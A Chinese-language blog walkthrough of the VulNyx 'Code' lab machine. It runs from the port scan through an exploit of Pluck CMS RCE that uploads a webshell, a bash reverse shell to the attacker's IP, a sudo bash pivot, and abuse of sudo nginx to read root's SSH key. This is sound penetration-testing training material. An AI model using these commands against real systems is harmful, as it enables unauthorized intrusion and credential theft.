靶场练习-vulnyx：Code - Easy - VulNyx - 靶场练习 | 🎐清风. = 劈开深海，填入我的山🍂

# 靶场搭建

下载：Code

Nat：IP： 192.168.1.132

	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
	\| ssh-hostkey:
	\| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
	\|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
	80/tcp open http Apache httpd 2.4.57 ((Debian))
	\|_http-title: Apache2 Debian Default Page: It works
	\|_http-server-header: Apache/2.4.57 (Debian)
	MAC Address: 00:0C:29:6C:57:10 (VMware)

扫目录扫出来 pluck

登录密码弱口令 admin

搜一下 exp，发现有 RCE 的，直接利用

	┌──(root㉿kali)-[~]
	└─# python 49909.py 192.168.1.132 80 admin /pluck

	Authentification was succesfull, uploading webshell

	Uploaded Webshell to: http://192.168.1.132:80/pluck/files/shell.phar

OK 了家人，弹个 shell 出来吧： bash -c "bash -i >& /dev/tcp/192.168.1.129/4444 0>&1"

	www-data@code:/var/www/html/pluck/files$ sudo -l
	sudo -l
	Matching Defaults entries for www-data on code:
	env_reset, mail_badpass,
	secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
	use_pty

	User www-data may run the following commands on code:
	(dave) NOPASSWD: /usr/bin/bash
	www-data@code:/var/www/html/pluck/files$ sudo -u dave bash

拿到了 dave 的 shell

	dave@code:/var/www/html/pluck/files$ sudo -l
	Matching Defaults entries for dave on code:
	env_reset, mail_badpass,
	secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
	use_pty

	User dave may run the following commands on code:
	(root) NOPASSWD: /usr/sbin/nginx

nginx 的 sudo 权限

添加一个 nginx 的配置

访问： http://192.168.1.132:1234/root/.ssh/id_rsa

拿到密钥，需要密码。爆破不开只能继续信息收集

/var/www/html/pluck/data/settings 目录下的 pass.php 中保存了密码

密码： $3cUr3_p4$$w0rD

登录拿到 root